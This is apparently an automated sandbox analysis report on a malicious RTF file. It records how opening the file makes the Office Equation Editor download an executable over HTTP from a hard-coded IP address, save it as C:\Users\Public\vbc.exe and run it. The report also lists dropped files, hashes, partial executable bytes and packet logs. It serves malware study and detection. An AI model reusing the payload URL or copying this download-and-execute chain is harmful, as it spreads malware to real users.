Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........,..SM.SM.SM..Q..RM..o.UM.ek.RM.RichSM.................PE..L....#L......................B.....$........ ....@...........................E......QE.....................................t...(....0....B.........P.E.....................................................0... ....................................text...$........................... ..`.data...p.... ....... ..............@....rsrc.....B..0....B..0..............@..@...I............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\T81Ip9NCGi.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Dec 2 03:57:13 2021, mtime=Thu Dec 2 03:57:13 2021, atime=Thu Dec 2 03:57:16 2021, length=18403, window=hide
Category:	dropped
Size (bytes):	1014
Entropy (8bit):	4.531820687735484
Encrypted:	false
SSDEEP:	12:8N2PFgXg/XAlCPCHaXeBhB/z+X+Wnba/sAm4Ticvbly41sAm4VDtZ3YilMMEpxRG:8N4/XTuzc15AseCAjDv3q7Qd7Qy
MD5:	8593369DA2490C4D690D72E160EC2CA3
SHA1:	4FC38185BEEEC9C367C20A048077C56D56A0B2D4
SHA-256:	34C5DFDBE2E81FB98D38382C1C530D3E95AF48709CC84EF9BE6E46BB0BE6723F
SHA-512:	D92CF3B334A39874B8CFECBCADE7DD6F626412E4411CD3E53C7566076B8D89EC8280CF60D2D8DC0ADCA68DCA9A945B87AA6FE42B1FA5B140883C48EEE8F2944D
Malicious:	false
Preview:	L..................F.... ...S...9...S...9....V..9....G...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S ...user.8......QK.X.S ....&=....U...............A.l.b.u.s.....z.1......S''..Desktop.d......QK.X.S''..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2..G...S)' .T81IP9~1.RTF..J......S''.S''.........................T.8.1.I.p.9.N.C.G.i...r.t.f.......x...............-...8...[............?J......C:\Users\..#...................\\226546\Users.user\Desktop\T81Ip9NCGi.rtf.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.T.8.1.I.p.9.N.C.G.i...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......226546..........D_....3N...W...9..g............[D_....3N...W...9..g...

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.748011161929185
Encrypted:	false
SSDEEP:	3:bDuMJlpWsVtvomxW6Btvov:bCiWsVVjVy
MD5:	1D77163C0F35431030160BF3341C3B4B
SHA1:	BB1F38491850D9953B0CA1E2492D4D55B39F3E50
SHA-256:	D1DEC03FB357CAEBB191B639244E0762D6F8F177BAD7E314AE80B952BDE8C384
SHA-512:	2EB3AB0A9775433EB7285364B4F5534EE4EA50725611754D4A262C030763D164A13A1DA5E20B96F550894E006711E4C16F91B8A346A4142216EF045002D2D798
Malicious:	false
Preview:	[folders]..Templates.LNK=0..T81Ip9NCGi.LNK=0..[misc]..T81Ip9NCGi.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.5038355507075254
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
MD5:	45B1E2B14BE6C1EFC217DCE28709F72D
SHA1:	64E3E91D6557D176776A498CF0776BE3679F13C3
SHA-256:	508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
SHA-512:	2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\3RY9W7X3.txt Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	62
Entropy (8bit):	4.029999133836105
Encrypted:	false
SSDEEP:	3:vpqMLJUQ2lOCsRRGcTk/n:vEMWXlOCsRR6
MD5:	ADB392BC717EDD06CE9EC32DCECFE628
SHA1:	EED907EBCE20C46D1FCC3D55AA60C896FCA0543D
SHA-256:	60AB9E8D2AB8FE84107A6DEC8FBBFAED35786593B2D17E05D116CAFAE84FADC2
SHA-512:	F8C69C818D06E9F8E2AFCFD42126671DAF8AA578BA5F7510C2159EC401DB0DB010D26C778996BA64FA86BDEE47D3A9A0B655EAAA9DB2E76B08336CDC3EFFB3BA
Malicious:	false
IE Cache URL:	live.com/
Preview:	wla42..live.com/.1536.738723328.30927982.255686239.30926650.*.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\W56Z07SP.txt Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	62
Entropy (8bit):	4.092532149055232
Encrypted:	false
SSDEEP:	3:vpqMLJUQ2udSLCsKfOW2I/n:vEMWXS8Csq2+
MD5:	4627BA4A1F33E5418EBE1537A38D5993
SHA1:	DA04BE94C45C85115B543C742C2037374E89C30D
SHA-256:	DB56B1FCD113AC79ECE19BAA1D68DDED7341C419B2498250218F3A5C6783BC70
SHA-512:	C0DEAB6D1863A717C852FDF72E31F59A1D6B60C7A9443FF6C74CBD59E13AC3898751343556784A8218FFF5CE9E72581F291A32E93BB5E1CD24BFE78ECF8CB65A
Malicious:	false
Preview:	wla42..live.com/.1536.788723328.30927982.300770641.30926650.*.

C:\Users\user\AppData\Roaming\misv.exe Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	135018
Entropy (8bit):	7.060957913639306
Encrypted:	false
SSDEEP:	3072:gbG7N2kDTHUpou4ubvh1q2SRdteVQNOqeOEgyVlzba:gbE/HUjva2udnNOqbByVlPa
MD5:	1DA682EC8DCBC375B6E76660EF46D3FD
SHA1:	B7DA4D771226B5A4F045B0D8A263451612EE3303
SHA-256:	6D624544826CC99182030BB50757944FEE3734EA01E8C37A77A22214BFF4B9DF
SHA-512:	2077475610EAA19020D7AFA36896B3E995D66651F4D0E8B4EB8523D64EA8C4B5C48778081182C033FD3C330A253EF8FA34E935BAD4EF7947CD17EE09B126AA4F
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Joe Sandbox View:	Filename: QEw7lxB2iE.rtf, Detection: malicious, Browse Filename: sKxsGhU1Wg.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j..........-5............@.......................................@..........................................................................................................................................................text....h.......j.................. ..`.rdata...............n..............@..@.data...............................@....ndata...`...`...........................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\~$1Ip9NCGi.rtf Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.5038355507075254
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
MD5:	45B1E2B14BE6C1EFC217DCE28709F72D
SHA1:	64E3E91D6557D176776A498CF0776BE3679F13C3
SHA-256:	508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
SHA-512:	2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

C:\Users\Public\vbc.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	131595
Entropy (8bit):	7.073841941088541
Encrypted:	false
SSDEEP:	3072:gbG7N2kDTHUpou4ub+HbksLwq6cttYgSj+LaQitS42:gbE/HUjwkshtOlj+LaQitE
MD5:	99BDB5995C8DD619A3EC2B799D1CF868
SHA1:	7EB9E30BA8572F07A1E88972AD8F14954E84EB39
SHA-256:	C6F93EB69924750ADBE61115B2D6A200D534E783C6BD4CA0E2C0CD2969E9469E
SHA-512:	8A2817D4CD4D9584C0C723CA96550B65F530C6DE6193B977239CE3C90C8EB0E3942B7ECF2AC3F12C730AE053C3A88993D54BFED16FEE6B2CC5AA5083105C52D6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 20%
Joe Sandbox View:	Filename: QEw7lxB2iE.rtf, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j..........-5............@.......................................@..........................................................................................................................................................text....h.......j.................. ..`.rdata...............n..............@..@.data...............................@....ndata...`...`...........................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	Rich Text Format data, unknown version
Entropy (8bit):	3.8961893755654535
TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	T81Ip9NCGi.rtf
File size:	18403
MD5:	79b064007e51e1cfb2f7c91c732242a9
SHA1:	c4748fd11683b4b02e5bbc13746005a023f66568
SHA256:	b5784dc5717d0733bcdd150fda07cc94bcc2e2529e0f03e3bb9ec9b623302496
SHA512:	ae4601607f1ab7cd49cf1bd3f99b814936cdaa1fbd0d4c48194e914c843ad35720a9aa3d0ea7a8c236247d0c166188c4fdc6b17be7da560827eb471ab01b100b
SSDEEP:	384:B8TOyxGioDT31T1cn2UXNaMoPjhaeFkfylzc:B8TjxmDT3CFNShpFUMc
File Content Preview:	{\rtf79583\|!`=_-^;.<??^?!^!%.%_.?57#~:7@9:[:6~?%@.<.2_=!!!4,9??]%?%][+_399~&%3=?0#42>>\|;~1)@;54@?)/?,?7;5?%?677).^9_?\|934~\|,&28_5?3/2+4.%%0?`^(3]?%~).12!/#~%?.]\|.>+7-_-@@2?<&)>@;:]>$?[.?_!\|&%=8<&2`4%!_~.~8'%+%1>?%].'.7$'4.\|',9~'=7!!47./??;9:,:#?%.<[

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static RTF Info

Objects

Id	Start	Format ID	Format	Classname	Datasize	Filename	Sourcepath	Temppath	Exploit
0	000005F3h								no
1	000005C3h								no

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 1, 2021 20:57:57.919903040 CET	49165	80	192.168.2.22	192.3.122.180
Dec 1, 2021 20:57:58.034516096 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.034670115 CET	49165	80	192.168.2.22	192.3.122.180
Dec 1, 2021 20:57:58.035166025 CET	49165	80	192.168.2.22	192.3.122.180
Dec 1, 2021 20:57:58.153230906 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.153278112 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.153299093 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.153323889 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.153407097 CET	49165	80	192.168.2.22	192.3.122.180
Dec 1, 2021 20:57:58.159173965 CET	49165	80	192.168.2.22	192.3.122.180
Dec 1, 2021 20:57:58.267669916 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.267709970 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.267733097 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.267750978 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.267772913 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.267791986 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.267894030 CET	49165	80	192.168.2.22	192.3.122.180
Dec 1, 2021 20:57:58.271181107 CET	49165	80	192.168.2.22	192.3.122.180
Dec 1, 2021 20:57:58.273269892 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.273317099 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.273372889 CET	49165	80	192.168.2.22	192.3.122.180
Dec 1, 2021 20:57:58.273391008 CET	49165	80	192.168.2.22	192.3.122.180
Dec 1, 2021 20:57:58.382316113 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.382353067 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.382371902 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.382390022 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.382412910 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.382436037 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.382457972 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.382479906 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.382486105 CET	49165	80	192.168.2.22	192.3.122.180
Dec 1, 2021 20:57:58.382503033 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.382518053 CET	49165	80	192.168.2.22	192.3.122.180
Dec 1, 2021 20:57:58.382520914 CET	49165	80	192.168.2.22	192.3.122.180
Dec 1, 2021 20:57:58.382529020 CET	49165	80	192.168.2.22	192.3.122.180
Dec 1, 2021 20:57:58.384428024 CET	49165	80	192.168.2.22	192.3.122.180
Dec 1, 2021 20:57:58.387448072 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.387469053 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.387528896 CET	49165	80	192.168.2.22	192.3.122.180
Dec 1, 2021 20:57:58.387636900 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.387655020 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.387671947 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.387672901 CET	49165	80	192.168.2.22	192.3.122.180
Dec 1, 2021 20:57:58.387689114 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.387696028 CET	49165	80	192.168.2.22	192.3.122.180
Dec 1, 2021 20:57:58.387701035 CET	49165	80	192.168.2.22	192.3.122.180
Dec 1, 2021 20:57:58.387713909 CET	49165	80	192.168.2.22	192.3.122.180
Dec 1, 2021 20:57:58.499804020 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.499847889 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.499865055 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.499888897 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.499916077 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.499941111 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.499963999 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.499988079 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.499986887 CET	49165	80	192.168.2.22	192.3.122.180
Dec 1, 2021 20:57:58.500010967 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.500015020 CET	49165	80	192.168.2.22	192.3.122.180
Dec 1, 2021 20:57:58.500035048 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.500052929 CET	49165	80	192.168.2.22	192.3.122.180
Dec 1, 2021 20:57:58.500056982 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.500078917 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.500082016 CET	49165	80	192.168.2.22	192.3.122.180
Dec 1, 2021 20:57:58.500099897 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.500116110 CET	49165	80	192.168.2.22	192.3.122.180
Dec 1, 2021 20:57:58.500123024 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.500147104 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.500147104 CET	49165	80	192.168.2.22	192.3.122.180
Dec 1, 2021 20:57:58.500166893 CET	49165	80	192.168.2.22	192.3.122.180
Dec 1, 2021 20:57:58.500171900 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.500195980 CET	49165	80	192.168.2.22	192.3.122.180
Dec 1, 2021 20:57:58.500196934 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.500219107 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.500226021 CET	49165	80	192.168.2.22	192.3.122.180
Dec 1, 2021 20:57:58.500255108 CET	49165	80	192.168.2.22	192.3.122.180
Dec 1, 2021 20:57:58.503081083 CET	49165	80	192.168.2.22	192.3.122.180
Dec 1, 2021 20:57:58.504206896 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.504235029 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.504260063 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.504283905 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.504287958 CET	49165	80	192.168.2.22	192.3.122.180
Dec 1, 2021 20:57:58.504311085 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.504314899 CET	49165	80	192.168.2.22	192.3.122.180
Dec 1, 2021 20:57:58.504338026 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.504348040 CET	49165	80	192.168.2.22	192.3.122.180
Dec 1, 2021 20:57:58.504364967 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.504390001 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.504390001 CET	49165	80	192.168.2.22	192.3.122.180
Dec 1, 2021 20:57:58.504417896 CET	49165	80	192.168.2.22	192.3.122.180
Dec 1, 2021 20:57:58.504417896 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.504446030 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.504448891 CET	49165	80	192.168.2.22	192.3.122.180
Dec 1, 2021 20:57:58.504472017 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.504492998 CET	49165	80	192.168.2.22	192.3.122.180
Dec 1, 2021 20:57:58.504492998 CET	80	49165	192.3.122.180	192.168.2.22
Dec 1, 2021 20:57:58.504532099 CET	49165	80	192.168.2.22	192.3.122.180
Dec 1, 2021 20:57:58.504559040 CET	49165	80	192.168.2.22	192.3.122.180
Dec 1, 2021 20:57:58.505203009 CET	49165	80	192.168.2.22	192.3.122.180
Dec 1, 2021 20:57:58.507167101 CET	49165	80	192.168.2.22	192.3.122.180
Dec 1, 2021 20:57:58.614382982 CET	80	49165	192.3.122.180	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 1, 2021 20:59:55.853311062 CET	52167	53	192.168.2.22	8.8.8.8
Dec 1, 2021 20:59:57.084176064 CET	50591	53	192.168.2.22	8.8.8.8
Dec 1, 2021 21:00:02.072386026 CET	57805	53	192.168.2.22	8.8.8.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Dec 1, 2021 20:59:55.853311062 CET	192.168.2.22	8.8.8.8	0x6471	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)
Dec 1, 2021 20:59:57.084176064 CET	192.168.2.22	8.8.8.8	0x6897	Standard query (0)	eruitg.bl.files.1drv.com	A (IP address)	IN (0x0001)
Dec 1, 2021 21:00:02.072386026 CET	192.168.2.22	8.8.8.8	0x9122	Standard query (0)	fspzka.bl.files.1drv.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Type	Class
Dec 1, 2021 20:59:55.888254881 CET	8.8.8.8	192.168.2.22	0x6471	No error (0)	onedrive.live.com	odc-web-geo.onedrive.akadns.net	CNAME (Canonical name)	IN (0x0001)
Dec 1, 2021 20:59:57.183187008 CET	8.8.8.8	192.168.2.22	0x6897	No error (0)	eruitg.bl.files.1drv.com	bl-files.fe.1drv.com	CNAME (Canonical name)	IN (0x0001)
Dec 1, 2021 20:59:57.183187008 CET	8.8.8.8	192.168.2.22	0x6897	No error (0)	bl-files.fe.1drv.com	odc-bl-files-geo.onedrive.akadns.net	CNAME (Canonical name)	IN (0x0001)
Dec 1, 2021 21:00:02.143680096 CET	8.8.8.8	192.168.2.22	0x9122	No error (0)	fspzka.bl.files.1drv.com	bl-files.fe.1drv.com	CNAME (Canonical name)	IN (0x0001)
Dec 1, 2021 21:00:02.143680096 CET	8.8.8.8	192.168.2.22	0x9122	No error (0)	bl-files.fe.1drv.com	odc-bl-files-geo.onedrive.akadns.net	CNAME (Canonical name)	IN (0x0001)

HTTP Request Dependency Graph

192.3.122.180

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	192.3.122.180	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 20:57:58.035166025 CET	0	OUT	GET /1100/vbc.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 192.3.122.180 Connection: Keep-Alive
Dec 1, 2021 20:57:58.153230906 CET	1	IN	HTTP/1.1 200 OK Date: Wed, 01 Dec 2021 19:57:58 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.3.31 Last-Modified: Wed, 01 Dec 2021 09:20:35 GMT ETag: "2020b-5d2122fb5045c" Accept-Ranges: bytes Content-Length: 131595 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 08 81 e9 50 66 d2 e9 50 66 d2 e9 50 66 d2 2a 5f 39 d2 eb 50 66 d2 e9 50 67 d2 4c 50 66 d2 2a 5f 3b d2 e6 50 66 d2 bd 73 56 d2 e3 50 66 d2 2e 56 60 d2 e8 50 66 d2 52 69 63 68 e9 50 66 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5a 9b 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 6a 00 00 00 da 02 00 00 08 00 00 2d 35 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 e0 04 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 86 00 00 a0 00 00 00 00 c0 04 00 e0 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 97 68 00 00 00 10 00 00 00 6a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a6 14 00 00 00 80 00 00 00 16 00 00 00 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 b0 02 00 00 a0 00 00 00 06 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 60 01 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 e0 11 00 00 00 c0 04 00 00 12 00 00 00 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1PfPfPf_9PfPgLPf_;PfsVPf.V`PfRichPfPELZOaj-5@@.texthj `.rdatan@@.data@.ndata``.rsrc@@

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 1724 Parent PID: 596

General

Start time:	20:57:16
Start date:	01/12/2021
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x13f860000
File size:	1423704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: EQNEDT32.EXE PID: 1124 Parent PID: 596

General

Start time:	20:57:18
Start date:	01/12/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: vbc.exe PID: 2836 Parent PID: 1124

General

Start time:	20:57:20
Start date:	01/12/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\vbc.exe"
Imagebase:	0x400000
File size:	131595 bytes
MD5 hash:	99BDB5995C8DD619A3EC2B799D1CF868
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 20%, ReversingLabs
Reputation:	low

Analysis Process: Acly3.exe PID: 2804 Parent PID: 2836

General

Start time:	20:57:23
Start date:	01/12/2021
Path:	C:\Users\user\AppData\Local\Temp\Acly3.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\Acly3.exe
